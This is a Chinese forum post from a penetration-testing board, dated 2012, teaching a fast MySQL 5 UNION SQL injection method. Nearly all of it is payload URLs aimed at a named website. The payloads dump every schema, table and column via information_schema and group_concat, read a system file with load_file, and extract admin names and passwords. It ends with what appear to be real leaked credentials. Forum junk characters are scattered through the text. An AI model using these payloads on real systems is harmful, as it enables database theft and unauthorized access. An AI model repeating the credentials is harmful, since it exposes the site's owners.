中国网络渗透测试联盟

标题: mysql注入高效方法 [打印本页]
作者: admin    时间: 2012-9-13 16:37
标题: mysql注入高效方法
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似$ P8 |2 l! U6 t4 U! i) {6 L
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
- l$ m" V1 c6 t; M/ R- z3 |+ V$ w+ G( ^0 j1 Y( `9 I7 D; p+ P' `, o
, X5 b) x6 ]* v  ^/ u
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
( a; p. @7 W# j- @3 t7 \* g# y" `9 c  n1 O8 K% C+ y, W
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
, z  e7 X5 Y1 o5 @# S1 n' l: G
$ ?3 H7 P" I# T下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示: E' L; Q* w* z7 [, u
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等
( P' d+ o+ o/ r% Y9 C1 b3 }  B: Y2 f1 u% z% |& ~& O* D6 m- i8 M
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17+ N0 v( i) a) |" `. q+ ^; ~8 p

7 A8 z2 h( Y7 u, g7 C; o% K读出所有库:4 z' I& w, U2 R2 B* q' i, w: ]
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
2 ?6 B$ L( n1 I* z" e+ c
$ Q$ o6 R% Q- ]/ V1 g# d6 l; A- j4 q6 j$ r2 M- q$ o/ b" X0 ]

; t( ]0 p; L7 I0 [1 G  ~4 ^& S' e读出所有表:
& o# c2 U' U0 I' x/ \http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()" e% i2 a, y* X1 ?7 a

+ a; N( f. ^7 G6 }5 u读出所有表字段:/ d3 @& t% f0 h, K/ H
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
- G* C+ u/ v8 m. D*/ (97,100,109,105,110)为admin的ascii码 依次类推, ]! V4 L$ r8 |0 a
, @4 g: U! E! ^2 v
读出所有表字段里的内容:6 u! @4 K- k9 L
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
' O8 {9 p1 D& y- R3 Y, l! C
7 W* l1 D5 U& d. |. I8 u* _* t+ l9 c. q' N3 U

) A. n+ Q8 {9 Y. [
$ y) R6 |8 Y8 a4 u& c6 O
* {- s6 b# i, P3 a: }4 y  R6 l4 j5 O( g+ c9 Z' b
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
* w4 {3 o( Z  Z5 A2 G9 C) y2 K' Y' ?

# A" V8 k' d) t7 x! Ahttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23. Z6 ^6 R) K0 o& W1 T
9 @  R( }" o( Q$ A3 z& ^
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23& R0 |8 r2 X& C' T! e$ [$ |. |

& r# O  q9 N: ?, _% Z1 |' B0 Z
1 F( N5 z) W5 ]! T+ B; v5 \http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
: M3 b. L* }0 t- O$ J- _+ \  T& Z' O3 P
! j% i3 B/ D0 \1 a
        webmaster:dzb521123,simlab:simadmin20043233
* j! A2 |6 V) y# t, B



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2